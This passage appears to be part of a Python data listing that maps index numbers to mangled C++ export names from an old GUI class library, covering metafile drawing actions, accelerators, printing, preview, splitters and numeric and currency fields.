297: b'??_7GDIInAct@@6B@',
298: b'??_7GDIInClipAct@@6B@',
299: b'??_7GDIKernTextAct@@6B@',
300: b'??_7GDILineAct@@6B@',
301: b'??_7GDIMTFAction@@6B@',
302: b'??_7GDIMapAct@@6B@',
303: b'??_7GDIMoveClipAct@@6B@',
304: b'??_7GDIPenAct@@6B@',
305: b'??_7GDIPieAct@@6B@',
306: b'??_7GDIPixAct@@6B@',
307: b'??_7GDIPolLinAct@@6B@',
308: b'??_7GDIPolyPolyAct@@6B@',
309: b'??_7GDIPolygonAct@@6B@',
310: b'??_7GDIPopAct@@6B@',
311: b'??_7GDIPtAct@@6B@',
312: b'??_7GDIPushAct@@6B@',
313: b'??_7GDIRasterAct@@6B@',
314: b'??_7GDIRectAct@@6B@',
315: b'??_7GDISetOriginAction@@6B@',
316: b'??_7GDIStrechAct@@6B@',
317: b'??_7GDITextAct@@6B@',
318: b'??_GGDIArcAct@@UAEPAXI@Z',
319: b'??_GGDIBkBrushAct@@UAEPAXI@Z',
320: b'??_GGDIBmpAct@@UAEPAXI@Z',
321: b'??_GGDIBmpScalAct@@UAEPAXI@Z',
322: b'??_GGDIClipAct@@UAEPAXI@Z',
323: b'??_GGDIElipAct@@UAEPAXI@Z',
324: b'??_GGDIFillBrushAct@@UAEPAXI@Z',
325: b'??_GGDIFontAct@@UAEPAXI@Z',
326: b'??_GGDIHighAct@@UAEPAXI@Z',
327: b'??_GGDIIconAct@@UAEPAXI@Z',
328: b'??_GGDIInAct@@UAEPAXI@Z',
329: b'??_GGDIInClipAct@@UAEPAXI@Z',
330: b'??_GGDIKernTextAct@@UAEPAXI@Z',
331: b'??_GGDILineAct@@UAEPAXI@Z',
332: b'??_GGDIMTFAction@@UAEPAXI@Z',
333: b'??_GGDIMapAct@@UAEPAXI@Z',
334: b'??_GGDIMoveClipAct@@UAEPAXI@Z',
335: b'??_GGDIPenAct@@UAEPAXI@Z',
336: b'??_GGDIPieAct@@UAEPAXI@Z',
337: b'??_GGDIPixAct@@UAEPAXI@Z',
338: b'??_GGDIPolLinAct@@UAEPAXI@Z',
339: b'??_GGDIPolyPolyAct@@UAEPAXI@Z',
340: b'??_GGDIPolygonAct@@UAEPAXI@Z',
341: b'??_GGDIPopAct@@UAEPAXI@Z',
342: b'??_GGDIPtAct@@UAEPAXI@Z',
343: b'??_GGDIPushAct@@UAEPAXI@Z',
344: b'??_GGDIRasterAct@@UAEPAXI@Z',
345: b'??_GGDIRectAct@@UAEPAXI@Z',
346: b'??_GGDISetOriginAction@@UAEPAXI@Z',
347: b'??_GGDIStrechAct@@UAEPAXI@Z',
348: b'??_GGDITextAct@@UAEPAXI@Z',
349: b'?Execute@GDIArcAct@@UAEXPAX@Z',
350: b'?Execute@GDIBkBrushAct@@UAEXPAX@Z',
351: b'?Execute@GDIBmpAct@@UAEXPAX@Z',
352: b'?Execute@GDIBmpScalAct@@UAEXPAX@Z',
353: b'?Execute@GDIClipAct@@UAEXPAX@Z',
354: b'?Execute@GDIElipAct@@UAEXPAX@Z',
355: b'?Execute@GDIFillBrushAct@@UAEXPAX@Z',
356: b'?Execute@GDIFontAct@@UAEXPAX@Z',
357: b'?Execute@GDIHighAct@@UAEXPAX@Z',
358: b'?Execute@GDIIconAct@@UAEXPAX@Z',
359: b'?Execute@GDIInAct@@UAEXPAX@Z',
360: b'?Execute@GDIInClipAct@@UAEXPAX@Z',
361: b'?Execute@GDIKernTextAct@@UAEXPAX@Z',
362: b'?Execute@GDILineAct@@UAEXPAX@Z',
363: b'?Execute@GDIMTFAction@@UAEXPAX@Z',
364: b'?Execute@GDIMapAct@@UAEXPAX@Z',
365: b'?Execute@GDIMoveClipAct@@UAEXPAX@Z',
366: b'?Execute@GDIPenAct@@UAEXPAX@Z',
367: b'?Execute@GDIPieAct@@UAEXPAX@Z',
368: b'?Execute@GDIPixAct@@UAEXPAX@Z',
369: b'?Execute@GDIPolLinAct@@UAEXPAX@Z',
370: b'?Execute@GDIPolyPolyAct@@UAEXPAX@Z',
371: b'?Execute@GDIPolygonAct@@UAEXPAX@Z',
372: b'?Execute@GDIPopAct@@UAEXPAX@Z',
373: b'?Execute@GDIPtAct@@UAEXPAX@Z',
374: b'?Execute@GDIPushAct@@UAEXPAX@Z',
375: b'?Execute@GDIRasterAct@@UAEXPAX@Z',
376: b'?Execute@GDIRectAct@@UAEXPAX@Z',
377: b'?Execute@GDISetOriginAction@@UAEXPAX@Z',
378: b'?Execute@GDIStrechAct@@UAEXPAX@Z',
379: b'?Execute@GDITextAct@@UAEXPAX@Z',
380: b'?Len@String@@QBEGXZ',
381: b'??0Fraction@@QAE@ABV0@@Z',
382: b'??0MapMode@@QAE@ABV0@@Z',
383: b'??0MapMode@@QAE@ABVResId@@@Z',
384: b'??0MapMode@@QAE@W4MapUnit@@@Z',
385: b'??0MapMode@@QAE@W4MapUnit@@ABVPoint@@ABVFraction@@2@Z',
386: b'??0MapMode@@QAE@XZ',
387: b'??0Point@@QAE@FF@Z',
388: b'??1MapMode@@QAE@XZ',
389: b'??4Fraction@@QAEAAV0@ABV0@@Z',
390: b'??4MapMode@@QAEAAV0@ABV0@@Z',
391: b'??8MapMode@@QBEEABV0@@Z',
392: b'??9MapMode@@QBEEABV0@@Z',
393: b'??9Pair@@QBEEABV0@@Z',
394: b'?ChangeMapUnit@MapMode@@QAE?AW4MapUnit@@W42@@Z',
395: b'?ChangeOrigin@MapMode@@QAE?AVPoint@@ABV2@@Z',
396: b'?ChangeScaleX@MapMode@@QAE?AVFraction@@ABV2@@Z',
397: b'?ChangeScaleY@MapMode@@QAE?AVFraction@@ABV2@@Z',
398: b'??0AccelData@@QAE@ABV0@@Z',
399: b'??0AccelData@@QAE@XZ',
400: b'??0AccelEntry@@QAE@XZ',
401: b'??0AccelTable@@QAE@ABV0@@Z',
402: b'??0AccelTable@@QAE@GG@Z',
403: b'??0Accelerator@@QAE@ABV0@@Z',
404: b'??0Accelerator@@QAE@ABVResId@@@Z',
405: b'??0Accelerator@@QAE@XZ',
406: b'??0KeyCode@@QAE@XZ',
407: b'??0Table@@QAE@ABV0@@Z',
408: b'??1AccelData@@QAE@XZ',
409: b'??1AccelEntry@@QAE@XZ',
410: b'??1AccelTable@@QAE@XZ',
411: b'??1Accelerator@@UAE@XZ',
412: b'??1KeyCode@@QAE@XZ',
413: b'??1Table@@QAE@XZ',
414: b'??4Accelerator@@QAEAAV0@ABV0@@Z',
415: b'??_7Accelerator@@6B@',
416: b'??_GAccelData@@QAEPAXI@Z',
417: b'??_GAccelEntry@@QAEPAXI@Z',
418: b'??_GAccelerator@@UAEPAXI@Z',
419: b'?Activate@Accelerator@@UAEXXZ',
420: b'?ChangeAccel@Accelerator@@QAEPAV1@GPAV1@@Z',
421: b'?ChangeKeyCode@Accelerator@@QAE?AVKeyCode@@GABV2@@Z',
422: b'?Clear@AccelList@@QAEXXZ',
423: b'?Clear@AccelTable@@QAEXXZ',
424: b'?Clear@Accelerator@@QAEXXZ',
425: b'?Clear@List@@QAEXXZ',
426: b'?Clear@Table@@QAEXXZ',
427: b'?Count@AccelTable@@QBEKXZ',
428: b'?Count@Table@@QBEKXZ',
429: b'?Deactivate@Accelerator@@UAEXXZ',
430: b'?EnableItem@Accelerator@@QAEEGE@Z',
431: b'?First@AccelList@@QAEPAVAccelerator@@XZ',
432: b'?First@AccelTable@@QAEPAVAccelEntry@@XZ',
433: b'?Get@AccelTable@@QBEPAVAccelEntry@@K@Z',
434: b'?GetAccel@Accelerator@@QBEPAV1@G@Z',
435: b'?GetCurKey@AccelTable@@QBEKXZ',
436: b'?GetFullCode@KeyCode@@QBEGXZ',
437: b'?GetFullFunction@KeyCode@@QBE?AW4KeyFuncType@@XZ',
438: b'?GetItemCount@Accelerator@@QBEGXZ',
439: b'?GetItemId@Accelerator@@QBEGABVKeyCode@@@Z',
440: b'?GetItemId@Accelerator@@QBEGG@Z',
441: b'?GetKeyCode@Accelerator@@QBE?AVKeyCode@@G@Z',
442: b'?InitAccelerator@@YGXPAVAccelerator@@@Z',
443: b'?Insert@AccelTable@@QAEEKPAVAccelEntry@@@Z',
444: b'?InsertItem@Accelerator@@QAEEABVResId@@@Z',
445: b'?InsertItem@Accelerator@@QAEEGABVKeyCode@@@Z',
446: b'?IsFunction@KeyCode@@QBEEXZ',
447: b'?IsItemEnabled@Accelerator@@QBEEG@Z',
448: b'?Next@AccelList@@QAEPAVAccelerator@@XZ',
449: b'?Next@AccelTable@@QAEPAVAccelEntry@@XZ',
450: b'?PopActivateHdl@Accelerator@@QAE?AVLink@@XZ',
451: b'?PopDeactivateHdl@Accelerator@@QAE?AVLink@@XZ',
452: b'?PopSelectHdl@Accelerator@@QAE?AVLink@@XZ',
453: b'?PushActivateHdl@Accelerator@@QAEXABVLink@@@Z',
454: b'?PushDeactivateHdl@Accelerator@@QAEXABVLink@@@Z',
455: b'?PushSelectHdl@Accelerator@@QAEXABVLink@@@Z',
456: b'?Remove@AccelTable@@QAEPAVAccelEntry@@K@Z',
457: b'?RemoveItem@Accelerator@@QAEXG@Z',
458: b'?Select@Accelerator@@UAEXXZ',
459: b'?SetHelpText@Accelerator@@QAEXABVString@@@Z',
460: b'??0AccelList@@QAE@ABV0@@Z',
461: b'??0AccelList@@QAE@GG@Z',
462: b'??0List@@QAE@ABV0@@Z',
463: b'??0List@@QAE@GG@Z',
464: b'??1AccelList@@QAE@XZ',
465: b'??1List@@QAE@XZ',
466: b'??_GAccelList@@QAEPAXI@Z',
467: b'?Count@AccelList@@QBEKXZ',
468: b'?Count@List@@QBEKXZ',
469: b'?GetAccelType@@YG?AW4AccelType@@PAVAccelerator@@@Z',
470: b'?GetCode@KeyCode@@QBEGXZ',
471: b'?GetObject@AccelList@@QBEPAVAccelerator@@K@Z',
472: b'?GetObject@List@@QBEPAXK@Z',
473: b'?GetPos@AccelList@@QBEKPAVAccelerator@@@Z',
474: b'?GetPos@List@@QBEKPBX@Z',
475: b'?Insert@AccelList@@QAEXPAVAccelerator@@K@Z',
476: b'?Insert@List@@QAEXPAXK@Z',
477: b'?IsMod1@KeyCode@@QBEEXZ',
478: b'?IsShift@KeyCode@@QBEEXZ',
479: b'?Remove@AccelList@@QAEPAVAccelerator@@PAV2@@Z',
480: b'?Remove@List@@QAEPAXPAX@Z',
481: b'?SetAccelCancelState@@YGXPAVAccelerator@@EPAVAccelList@@@Z',
482: b'?SetAccelItem@@YGXPAVAccelerator@@GABVKeyCode@@GPAVAccelList@@@Z',
483: b'?SetAccelList@@YGXPAVAccelerator@@PAVAccelList@@@Z',
484: b'?SetAccelType@@YGXPAVAccelerator@@W4AccelType@@@Z',
485: b'??0Link@@QAE@PAVLinkHdl@@P81@EJPAX@Z@Z',
486: b'??1InfoBox@@UAE@XZ',
487: b'?ChangeTimeoutHdl@Timer@@QAE?AVLink@@ABV2@@Z',
488: b'??1AutoTimer@@QAE@XZ',
489: b'??0JobSetup@@QAE@XZ',
490: b'??0PageMetaFile@@QAE@XZ',
491: b'??0Printer@@QAE@ABVString@@@Z',
492: b'??0Printer@@QAE@XZ',
493: b'??0Queue@@QAE@GG@Z',
494: b'??1PageMetaFile@@QAE@XZ',
495: b'??1Printer@@UAE@XZ',
496: b'??1Queue@@QAE@XZ',
497: b'??8JobSetup@@QBEEABV0@@Z',
498: b'??9JobSetup@@QBEEABV0@@Z',
499: b'??_7Printer@@6B@',
500: b'??_GPageMetaFile@@QAEPAXI@Z',
501: b'??_GPrinter@@UAEPAXI@Z',
502: b'?AbortJob@Printer@@QAEEXZ',
503: b'?ChangeEndPrintHdl@Printer@@QAE?AVLink@@ABV2@@Z',
504: b'?ChangePrintPageHdl@Printer@@QAE?AVLink@@ABV2@@Z',
505: b'?ChangeStartPrintHdl@Printer@@QAE?AVLink@@ABV2@@Z',
506: b'?EndJob@Printer@@QAEEXZ',
507: b'?EndPage@Printer@@QAEEXZ',
508: b'?EndPrint@Printer@@UAEXXZ',
509: b'?Error@Printer@@UAEXXZ',
510: b'?Get@Queue@@QAEPAXXZ',
511: b'?GetCurPrintPage@Printer@@QBEGXZ',
512: b'?GetJobSetup@Printer@@QAEEPAVJobSetup@@@Z',
513: b'?GetJobSetupSize@Printer@@QBEGXZ',
514: b'?GetOutputSizePixel@Printer@@UBE?AVSize@@XZ',
515: b'?GetPaperBinName@Printer@@QBE?AVString@@G@Z',
516: b'?HasSupport@Printer@@QAEEW4PrinterSupport@@E@Z',
517: b'?Insert@OutDevList@@QAEXPAVOutputDevice@@K@Z',
518: b'?InsertNewPage@Printer@@UAEXPAUPageMetaFile@@@Z',
519: b'?IsPrinting@Printer@@QBEEXZ',
520: b'?PrintPage@Printer@@UAEXXZ',
521: b'?Put@Queue@@QAEXPAX@Z',
522: b'?QueuePrintPageHdl@Printer@@QAEXPAV1@@Z',
523: b'?Record@GDIMetaFile@@QAEXPAVOutputDevice@@@Z',
524: b'?SetCopyCount@Printer@@QAEEGE@Z',
525: b'?SetJobSetup@Printer@@QAEEPAVJobSetup@@@Z',
526: b'?SetOrientation@Printer@@QAEEW4Orientation@@@Z',
527: b'?SetPageQueueSize@Printer@@UAEXG@Z',
528: b'?SetPaperBin@Printer@@QAEEG@Z',
529: b'?SetPrinterProps@Printer@@QAEEPBV1@@Z',
530: b'?SetQuality@Printer@@QAEEW4Quality@@@Z',
531: b'?Setup@Printer@@QAEEXZ',
532: b'?StartJob@Printer@@QAEEABVString@@@Z',
533: b'?StartPage@Printer@@QAEEXZ',
534: b'?StartPrint@Printer@@UAEXXZ',
535: b'??0Fraction@@QAE@XZ',
536: b'??0Preview@@QAE@PAVWindow@@G@Z',
537: b'??0Rectangle@@QAE@ABVPoint@@ABVSize@@@Z',
538: b'??1Preview@@UAE@XZ',
539: b'??_7Preview@@6BPrinter@@@',
540: b'??_7Preview@@6BWindow@@@',
541: b'??_EPreview@@WPA@AEPAXI@Z',
542: b'??_GPreview@@UAEPAXI@Z',
543: b'?CalcWindowSizePixel@Preview@@QBE?AVSize@@ABV2@@Z',
544: b'?ChangeCurPage@Preview@@QAEGG@Z',
545: b'?ChangeHookHdl@MetaFile@@QAE?AVLink@@ABV2@@Z',
546: b'?ChangePageOffset@Preview@@QAE?AVPoint@@ABV2@@Z',
547: b'?ChangeZoomFactor@Preview@@QAE?AVFraction@@ABV2@@Z',
548: b'?Count@Queue@@QBEKXZ',
549: b'?GetColor@Brush@@QBEABVColor@@XZ',
550: b'?GetColor@Font@@QBEABVColor@@XZ',
551: b'?GetColor@Pen@@QBEABVColor@@XZ',
552: b'?GetCurPage@Printer@@QBEGXZ',
553: b'?GetDenominator@Fraction@@QBEJXZ',
554: b'?GetFillColor@Brush@@QBEABVColor@@XZ',
555: b'?GetFillColor@Font@@QBEABVColor@@XZ',
556: b'?GetNumerator@Fraction@@QBEJXZ',
557: b'?GetObject@Queue@@QBEPAXK@Z',
558: b'?GetOrigin@MapMode@@QBEABVPoint@@XZ',
559: b'?GetPageOffsetPixel@Printer@@QBE?AVPoint@@XZ',
560: b'?GetPageQueueSize@Printer@@QBEGXZ',
561: b'?GetPaperSize@Printer@@QBE?AVSize@@XZ',
562: b'?GetPaperSizePixel@Printer@@QBE?AVSize@@XZ',
563: b'?GetRequestPage@Preview@@QBEGXZ',
564: b'?GetType@MetaAction@@QBEGXZ',
565: b'?GetVisibleSize@Preview@@QBE?AVSize@@XZ',
566: b'?Height@Size@@QBEFXZ',
567: b'?InsertNewPage@Preview@@UAEXPAUPageMetaFile@@@Z',
568: b'?Paint@Preview@@UAEXABVRectangle@@@Z',
569: b'?RequestPage@Preview@@UAEXXZ',
570: b'?SetPageQueueSize@Preview@@UAEXG@Z',
571: b'?Width@Size@@QBEFXZ',
572: b'?X@Point@@QBEFXZ',
573: b'?Y@Point@@QBEFXZ',
574: b'??0SplitBar@@QAE@PAVWindow@@ABVResId@@@Z',
575: b'??0SplitBar@@QAE@PAVWindow@@G@Z',
576: b'??0Splitter@@QAE@FPAVWindow@@G@Z',
577: b'??0Splitter@@QAE@PAVWindow@@ABVResId@@@Z',
578: b'??0Splitter@@QAE@PAVWindow@@G@Z',
579: b'??1SplitBar@@UAE@XZ',
580: b'??1Splitter@@UAE@XZ',
581: b'??4Rectangle@@QAEAAV0@ABV0@@Z',
582: b'??_7SplitBar@@6B@',
583: b'??_7Splitter@@6B@',
584: b'??_GSplitBar@@UAEPAXI@Z',
585: b'??_GSplitter@@UAEPAXI@Z',
586: b'?Bottom@Rectangle@@QAEAAFXZ',
587: b'?ChangeDragRectPixel@Splitter@@QAE?AVRectangle@@ABV2@PAVWindow@@@Z',
588: b'?ChangeScrollBar1@SplitBar@@QAEPAVScrollBar@@PAV2@@Z',
589: b'?ChangeScrollBar2@SplitBar@@QAEPAVScrollBar@@PAV2@@Z',
590: b'?ChangeSplitPosPixel@SplitBar@@UAEFF@Z',
591: b'?ChangeSplitPosPixel@Splitter@@UAEFF@Z',
592: b'?ChangeSplitWidthPixel@SplitBar@@QAEGG@Z',
593: b'?DeleteRegion@@YGXPAUHRGN__@@@Z',
594: b'?GetHeight@Rectangle@@QBEFXZ',
595: b'?GetPosPixel@MouseEvent@@QBEABVPoint@@XZ',
596: b'?GetWidth@Rectangle@@QBEFXZ',
597: b'?Left@Rectangle@@QAEAAFXZ',
598: b'?MouseButtonDown@Splitter@@UAEXABVMouseEvent@@@Z',
599: b'?MouseButtonUp@Splitter@@UAEXABVMouseEvent@@@Z',
600: b'?MouseMove@Splitter@@UAEXABVMouseEvent@@@Z',
601: b'?Resize@SplitBar@@UAEXXZ',
602: b'?Right@Rectangle@@QAEAAFXZ',
603: b'?Split@Splitter@@UAEXXZ',
604: b'?StartDrag@Splitter@@QAEXXZ',
605: b'?Top@Rectangle@@QAEAAFXZ',
606: b'?TopLeft@Rectangle@@QBE?AVPoint@@XZ',
607: b'??0EntryType@@QAE@ABVBitmap@@@Z',
608: b'??0EntryType@@QAE@ABVString@@@Z',
609: b'??0EntryType@@QAE@ABVString@@ABVBitmap@@@Z',
610: b'??1EntryType@@QAE@XZ',
611: b'??_GEntryType@@QAEPAXI@Z',
612: b'?GetCurPos@List@@QBEKXZ',
613: b'?Insert@List@@QAEXPAX@Z',
614: b'?Remove@List@@QAEPAXK@Z',
615: b'??0Rectangle@@QAE@ABVPoint@@0@Z',
616: b'??0SpinButton@@QAE@PAVWindow@@ABVResId@@@Z',
617: b'??0SpinButton@@QAE@PAVWindow@@G@Z',
618: b'??1SpinButton@@UAE@XZ',
619: b'??_7SpinButton@@6B@',
620: b'??_GSpinButton@@UAEPAXI@Z',
621: b'??_H@YGXPAXIHP6EX0@Z@Z',
622: b'?BottomLeft@Rectangle@@QBE?AVPoint@@XZ',
623: b'?BottomRight@Rectangle@@QBE?AVPoint@@XZ',
624: b'?Disable@SpinButton@@QAEXXZ',
625: b'?Down@SpinButton@@UAEXXZ',
626: b'?Enable@SpinButton@@QAEXXZ',
627: b'?GetKeyCode@KeyEvent@@QBEABVKeyCode@@XZ',
628: b'?GetSize@Rectangle@@QBE?AVSize@@XZ',
629: b'?GetTimeout@Timer@@QBEKXZ',
630: b'?IsLeft@MouseEvent@@QBEEXZ',
631: b'?KeyInput@SpinButton@@UAEXABVKeyEvent@@@Z',
632: b'?MouseButtonDown@SpinButton@@UAEXABVMouseEvent@@@Z',
633: b'?MouseButtonUp@SpinButton@@UAEXABVMouseEvent@@@Z',
634: b'?MouseMove@SpinButton@@UAEXABVMouseEvent@@@Z',
635: b'?Paint@SpinButton@@UAEXABVRectangle@@@Z',
636: b'?Resize@SpinButton@@UAEXXZ',
637: b'?Timeout@SpinButton@@QAEXPAVTimer@@@Z',
638: b'?TopRight@Rectangle@@QBE?AVPoint@@XZ',
639: b'?Up@SpinButton@@UAEXXZ',
640: b'??0BigInt@@QAE@H@Z',
641: b'??0BigInt@@QAE@J@Z',
642: b'??0BigInt@@QAE@XZ',
643: b'??0CurrFmt@@QAE@ABVResId@@@Z',
644: b'??0CurrFmt@@QAE@XZ',
645: b'??0CurrencyBox@@QAE@PAVWindow@@ABVResId@@@Z',
646: b'??0CurrencyBox@@QAE@PAVWindow@@G@Z',
647: b'??0CurrencyField@@QAE@PAVWindow@@ABVResId@@@Z',
648: b'??0CurrencyField@@QAE@PAVWindow@@G@Z',
649: b'??0KeyEvent@@QAE@XZ',
650: b'??0MetFmt@@QAE@ABVResId@@@Z',
651: b'??0MetFmt@@QAE@XZ',
652: b'??0MetricBox@@QAE@PAVWindow@@ABVResId@@@Z',
653: b'??0MetricBox@@QAE@PAVWindow@@G@Z',
654: b'??0MetricField@@QAE@PAVWindow@@ABVResId@@@Z',
655: b'??0MetricField@@QAE@PAVWindow@@G@Z',
656: b'??0NumFmt@@QAE@ABVResId@@@Z',
657: b'??0NumFmt@@QAE@XZ',
658: b'??0NumericBox@@QAE@PAVWindow@@ABVResId@@@Z',
659: b'??0NumericBox@@QAE@PAVWindow@@G@Z',
660: b'??0NumericField@@QAE@PAVWindow@@ABVResId@@@Z',
661: b'??0NumericField@@QAE@PAVWindow@@G@Z',
662: b'??0Rectangle@@QAE@FFFF@Z',
663: b'??0Selection@@QAE@FF@Z',
664: b'??0Selection@@QAE@XZ',
665: b'??0SpinField@@QAE@FPAVWindow@@G@Z',
666: b'??0SpinField@@QAE@PAVWindow@@ABVResId@@@Z',
667: b'??0SpinField@@QAE@PAVWindow@@G@Z',
668: b'??1CurrFmt@@QAE@XZ',
669: b'??1CurrencyBox@@UAE@XZ',
670: b'??1CurrencyField@@UAE@XZ',
671: b'??1KeyEvent@@QAE@XZ',
672: b'??1MetFmt@@QAE@XZ',
673: b'??1MetricBox@@UAE@XZ',
674: b'??1MetricField@@UAE@XZ',
675: b'??1NumFmt@@QAE@XZ',
676: b'??1NumericBox@@UAE@XZ',
677: b'??1NumericField@@UAE@XZ',
678: b'??1SpinField@@UAE@XZ',
679: b'??AString@@QBEDG@Z',
680: b'??BBigInt@@QBEJXZ',
681: b'??BFraction@@QBEJXZ',
682: b'??D@YG?AVBigInt@@ABV0@0@Z',
683: b'??K@YG?AVBigInt@@ABV0@0@Z',
684: b'??P@YGEABVBigInt@@0@Z',
685: b'??_7CurrFmt@@6B@',
686: b'??_7CurrencyBox@@6BComboBox@@@',
687: b'??_7CurrencyBox@@6BCurrFmt@@@',
688: b'??_7CurrencyField@@6BCurrFmt@@@',
689: b'??_7CurrencyField@@6BSpinField@@@',
690: b'??_7MetFmt@@6B@',
691: b'??_7MetricBox@@6BComboBox@@@',
692: b'??_7MetricBox@@6BMetFmt@@@',
693: b'??_7MetricField@@6BMetFmt@@@',
694: b'??_7MetricField@@6BSpinField@@@',
695: b'??_7NumFmt@@6B@',
696: b'??_7NumericBox@@6BComboBox@@@',
697: b'??_7NumericBox@@6BNumFmt@@@',
698: b'??_7NumericField@@6BNumFmt@@@',
699: b'??_7NumericField@@6BSpinField@@@',
700: b'??_7SpinField@@6B@',
701: b'??_GCurrencyBox@@UAEPAXI@Z',
702: b'??_GCurrencyField@@UAEPAXI@Z',
703: b'??_GMetricBox@@UAEPAXI@Z',
704: b'??_GMetricField@@UAEPAXI@Z',
705: b'??_GNumericBox@@UAEPAXI@Z',
706: b'??_GNumericField@@UAEPAXI@Z',
707: b'??_GSpinField@@UAEPAXI@Z',
708: b'?ChangeCustomUnitText@MetFmt@@QAE?AVString@@ABV2@@Z',
709: b'?ChangeDecimalDigits@NumFmt@@QAEGG@Z',
710: b'?ChangeFirst@MetricField@@QAEJJW4FieldUnit@@@Z',
711: b'?ChangeInternational@NumFmt@@QAE?AVInternational@@ABV2@@Z',
712: b'?ChangeLast@MetricField@@QAEJJW4FieldUnit@@@Z',
713: b'?ChangeMax@MetFmt@@QAEJJW4FieldUnit@@@Z',
714: b'?ChangeMax@NumFmt@@QAEJJ@Z',
715: b'?ChangeMin@MetFmt@@QAEJJW4FieldUnit@@@Z',
716: b'?ChangeMin@NumFmt@@QAEJJ@Z',
717: b'?ChangeStrictFormat@NumFmt@@QAEEE@Z',
718: b'?ChangeUnit@MetFmt@@QAE?AW4FieldUnit@@W42@@Z',
719: b'?ConvertToFraction@NumFmt@@QAE?AVFraction@@J@Z',
720: b'?ConvertToLong@NumFmt@@QAEJABVFraction@@@Z',
721: b'?CustomConvert@MetricBox@@UAEXXZ',
722: b'?CustomConvert@MetricField@@UAEXXZ',
723: b'?Denormalize@NumFmt@@QBEJJ@Z',
724: b'?Disable@SpinField@@QAEXXZ',
725: b'?Down@CurrencyField@@UAEXXZ',
726: b'?Down@MetricField@@UAEXXZ',
727: b'?Down@NumericField@@UAEXXZ',
728: b'?Down@SpinField@@UAEXXZ',
729: b'?Enable@SpinField@@QAEXXZ',
730: b'?First@CurrencyField@@UAEXXZ',
731: b'?First@MetricField@@UAEXXZ',
732: b'?First@NumericField@@UAEXXZ',
733: b'?First@SpinField@@UAEXXZ',
734: b'?GetCharCode@KeyEvent@@QBEDXZ',
735: b'?GetCurrDigits@CountryTable@@QBEGXZ',
736: b'?GetCurrDigits@International@@QBEGXZ',
737: b'?GetCurrNegativeFormat@CountryTable@@QBEGXZ',
738: b'?GetCurrNegativeFormat@International@@QBEGXZ',
739: b'?GetFirst@MetricField@@QBEJW4FieldUnit@@@Z',
740: b'?GetFocus@CurrencyBox@@UAEXXZ',
741: b'?GetFocus@CurrencyField@@UAEXXZ',
742: b'?GetFocus@MetricBox@@UAEXXZ',
743: b'?GetFocus@MetricField@@UAEXXZ',
744: b'?GetFocus@NumericBox@@UAEXXZ',
745: b'?GetFocus@NumericField@@UAEXXZ',
746: b'?GetFocus@SpinField@@UAEXXZ',
747: b'?GetGroup@KeyCode@@QBEGXZ',
748: b'?GetLast@MetricField@@QBEJW4FieldUnit@@@Z',
749: b'?GetLong@ResMgr@@SGJPAX@Z',
750: b'?GetLongRes@Resource@@SGJPAX@Z',
751: b'?GetMax@MetFmt@@QBEJW4FieldUnit@@@Z',
752: b'?GetMax@NumFmt@@QBEJXZ',
753: b'?GetMin@MetFmt@@QBEJW4FieldUnit@@@Z',
754: b'?GetMin@NumFmt@@QBEJXZ',
755: b'?GetModifier@KeyCode@@QBEGXZ',
756: b'?GetNumDecimalSep@CountryTable@@QBEDXZ',
757: b'?GetNumDecimalSep@International@@QBEDXZ',
758: b'?GetNumDigits@CountryTable@@QBEGXZ',
759: b'?GetNumDigits@International@@QBEGXZ',
760: b'?GetNumThousandSep@CountryTable@@QBEDXZ',
761: b'?GetNumThousandSep@International@@QBEDXZ',
762: b'?GetValue@CurrFmt@@QBEJXZ',
763: b'?GetValue@CurrencyBox@@QBEJG@Z',
764: b'?GetValue@MetFmt@@QBEJW4FieldUnit@@@Z',
765: b'?GetValue@MetricBox@@QBEJGW4FieldUnit@@@Z',
766: b'?GetValue@NumFmt@@QBEJXZ',
767: b'?GetValue@NumericBox@@QBEJG@Z',
768: b'?GetValuePos@CurrencyBox@@QBEGJ@Z',
769: b'?GetValuePos@MetricBox@@QBEGJW4FieldUnit@@@Z',
770: b'?GetValuePos@NumericBox@@QBEGJ@Z',
771: b'?InsertValue@CurrencyBox@@QAEXJG@Z',
772: b'?InsertValue@MetricBox@@QAEXJW4FieldUnit@@G@Z',
773: b'?InsertValue@NumericBox@@QAEXJG@Z',
774: b'?IsNumThousandSep@CountryTable@@QBEEXZ',
775: b'?IsNumThousandSep@International@@QBEEXZ',
776: b'?IsValueModified@NumFmt@@QBEEXZ',
777: b'?Justify@Selection@@QAEXXZ',
778: b'?KeyInput@CurrencyBox@@UAEXABVKeyEvent@@@Z',
779: b'?KeyInput@CurrencyField@@UAEXABVKeyEvent@@@Z',
780: b'?KeyInput@MetricBox@@UAEXABVKeyEvent@@@Z',
781: b'?KeyInput@MetricField@@UAEXABVKeyEvent@@@Z',
782: b'?KeyInput@NumericBox@@UAEXABVKeyEvent@@@Z',
783: b'?KeyInput@NumericField@@UAEXABVKeyEvent@@@Z',
784: b'?KeyInput@SpinField@@UAEXABVKeyEvent@@@Z',
785: b'?Last@CurrencyField@@UAEXXZ',
786: b'?Last@MetricField@@UAEXXZ',
787: b'?Last@NumericField@@UAEXXZ',
788: b'?Last@SpinField@@UAEXXZ',
789: b'?Len@Selection@@QBEFXZ',
790: b'?LoseFocus@CurrencyBox@@UAEXXZ',
791: b'?LoseFocus@CurrencyField@@UAEXXZ',
792: b'?LoseFocus@MetricBox@@UAEXXZ',
793: b'?LoseFocus@MetricField@@UAEXXZ',
794: b'?LoseFocus@NumericBox@@UAEXXZ',
795: b'?LoseFocus@NumericField@@UAEXXZ',
796: b'?LoseFocus@SpinField@@UAEXXZ',
797: b'?Modify@CurrencyBox@@UAEXXZ',
798: b'?Modify@CurrencyField@@UAEXXZ',
799: b'?Modify@MetricBox@@UAEXXZ',
800: b'?Modify@MetricField@@UAEXXZ',
801: b'?Modify@NumericBox@@UAEXXZ',
802: b'?Modify@NumericField@@UAEXXZ',
803: b'?Modify@SpinField@@UAEXXZ',
804: b'?MouseButtonDown@SpinField@@UAEXABVMouseEvent@@@Z',
805: b'?MouseButtonUp@SpinField@@UAEXABVMouseEvent@@@Z',
806: b'?MouseMove@SpinField@@UAEXABVMouseEvent@@@Z',
807: b'?Normalize@NumFmt@@QBEJJ@Z',
808: b'?Paint@SpinField@@UAEXABVRectangle@@@Z',
809: b'?Reformat@CurrFmt@@UAEXXZ',
810: b'?Reformat@MetFmt@@UAEXXZ',
811: b'?Reformat@NumFmt@@UAEXXZ',
812: b'?ReformatAll@CurrencyBox@@UAEXXZ',
813: b'?ReformatAll@MetricBox@@UAEXXZ',
814: b'?ReformatAll@NumFmt@@UAEXXZ',
815: b'?ReformatAll@NumericBox@@UAEXXZ',
816: b'?RemoveValue@CurrencyBox@@QAEXJ@Z',
